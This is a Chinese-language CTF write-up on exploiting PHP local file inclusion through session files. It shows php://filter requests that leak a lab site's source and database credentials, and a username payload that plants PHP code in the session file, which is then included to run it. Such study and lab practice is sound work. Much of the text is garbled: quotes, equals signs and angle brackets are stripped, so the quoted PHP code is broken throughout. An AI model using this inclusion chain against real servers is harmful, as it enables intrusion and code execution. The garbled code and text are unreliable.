
大家可以 在自己的靶场中导入代码先自己试一下 具体代码在文章中了解session可以先根据尝试包含到SESSION文件在根据文件内容寻找可控变量在构造payload插入到文件中最后包含即可。利用条件找到Session内的可控变量Session文件可读写并且知道存储路径php的session文件的保存路径可以在phpinfo的session.save_path看到session常见存储路径/var/lib/php/sess_PHPSESSID/var/lib/php/sess_PHPSESSID/tmp/sess_PHPSESSID/tmp/sessions/sess_PHPSESSIDsession文件格式 sess_[phpsessid] 而 phpsessid 在发送的请求的 cookie 字段中可以看到。ctf实战真题练习先给大家展示解题步骤和思路 文章后面附上源码首先我们可以利用php伪协议读取源码点击login我们链接变为 这里推测有文件包含这里我们利用php://filter 来读取源代码 需要用到convert.base64-encode 来转成base64http://10.100.29.220/include-test/session/index.php?actionphp://filter/readconvert.base64-encode/resourceindex.php得到源码login.php?php require_once(config.php);//require_once 是 PHP 中的一个语言结构用于包含并运行指定的 PHP 文件 它的核心特点是如果该文件已经被包含过则不会再次包含。 session_start(); if($_SESSION[username]) { header(Location: index.php); exit; } if($_POST[username] $_POST[password]) { $username $_POST[username]; $password md5($_POST[password]); $mysqli new mysqli($dbhost, $dbuser, $dbpass, $dbname); if ($mysqli-connect_errno) { die(could not connect to the database:\n . $mysqli-connect_error); } $sql select password from user where username?; $stmt $mysqli-prepare($sql); $stmt-bind_param(s, $username); $stmt-bind_result($res_password); $stmt-execute(); $stmt-fetch(); if ($res_password $password) { $_SESSION[username] base64_encode($username); header(location:index.php); } else { die(Invalid user name or password); } $stmt-close(); $mysqli-close(); } else { ? !DOCTYPE html html head titleLogin/title link hrefstatic/bootstrap.min.css relstylesheet script srcstatic/jquery.min.js/script script srcstatic/bootstrap.min.js/script /head body div classcontainer stylemargin-top:100px form actionlogin.php methodpost classwell stylewidth:220px;margin:0px auto; h3Login/h3 labelUsername:/label input typetext nameusername styleheight:30pxclassspan3/ labelPassword:/label input typepassword namepassword styleheight:30px classspan3 button typesubmit classbtn btn-primaryLOGIN/button /form /div /body /html ?php } ?利用同样的方式 找出register.php的源码http://10.100.29.220/include-test/session/index.php?actionphp://filter/readconvert.base64-encode/resourceregister.phpregister.php?php if ($_POST[username] $_POST[password]) { require_once(config.php); $username $_POST[username]; $password md5($_POST[password]); $mysqli new mysqli($dbhost, $dbuser, $dbpass, $dbname); if ($mysqli-connect_errno) { die(could not connect to the database:\n . $mysqli-connect_error); } $mysqli-set_charset(utf8); $sql select * from user where username?; $stmt $mysqli-prepare($sql); $stmt-bind_param(s, $username); $stmt-bind_result($res_id, $res_username, $res_password); $stmt-execute(); $stmt-store_result(); $count $stmt-num_rows(); if($count) { die(User name Already Exists); } else { $sql insert into user(username, password) values(?,?); $stmt $mysqli-prepare($sql); $stmt-bind_param(ss, $username, $password); $stmt-execute(); echo Register OK!a hrefindex.phpPlease Login/a; } $stmt-close(); $mysqli-close(); } else { ? !DOCTYPE html html head titleLogin/title link hrefstatic/bootstrap.min.css relstylesheet script srcstatic/jquery.min.js/script script srcstatic/bootstrap.min.js/script /head body div classcontainer stylemargin-top:100px form actionregister.php methodpost classwell stylewidth:220px;margin:0px auto; h3Register/h3 labelUsername:/label input typetext nameusername styleheight:30pxclassspan3/ labelPassword:/label input typepassword namepassword styleheight:30px classspan3 button typesubmit classbtn btn-primaryREGISTER/button /form /div /body /html ?php } ?同理config.php?php $dbhost localhost; $dbuser web; $dbpass webpass123; $dbname web; ?index.php?php error_reporting(0); session_start(); if (isset($_GET[action])) { include $_GET[action]; exit(); } else { ? !DOCTYPE html html langen head meta charsetutf-8 titleLogin/title meta nameviewport contentwidthdevice-width, initial-scale1.0 link hrefcss/bootstrap.css relstylesheet mediascreen link hrefcss/main.css relstylesheet mediascreen /head body div classcontainer div classform-signin ?php if (isset($_SESSION[username])) { ? ?php echo div class\alert alert-success\You have been strongsuccessfully logged in/strong./div a href\index.php?actionlogout.php\ class\btn btn-default btn-lg btn-block\Logout/a;}else{ ? ?php echo div class\alert alert-warning\Please Login./div a href\index.php?actionlogin.php\ class\btn btn-default btn-lg btn-block\Login/a a href\index.php?actionregister.php\ class\btn btn-default btn-lg btn-block\Register/a; } ? /div /div /body /html ?php } ?代码审计通过观察代码 发现sql注入根本不行 因为用了预编译 无从突破 现在观察login,php 发现$username是我们可控的并且被设置到了$_SESSION中 因此我们的数据没未经过滤就会被写到session 文件里面去 然后想到文件包含 大胆推测可以包含session文件 但是文件具体位置需要我们自己去猜测 这里我们使用自己的靶场 文件路径已知所以我们去注册 密码123456然后去登录 登录之后观察我们的session文件可以观察到 我们的用户名是以base64编码并且我们的代码中也是提到了 然后 发现一个问题username|s:24: 只有15位 我们知道base64 是4位一组 所以 我们需要有16位 这里就想到 我们在注册用户的之后可以将用户名超过100个字符 这样就够了所以我们又可以aaaaaaaaaaa...aaaa?php phpinfo();?现在就可以了最后http://10.100.29.220/include-test/session/index.php?actionphp://filter/readconvert.base64-decode/resourceD:\phpstudy_pro\Extensions\tmp\tmp\sess_36cv985gdb3ihhrgfe19lldmkkcmdphpinfo();然后完成题目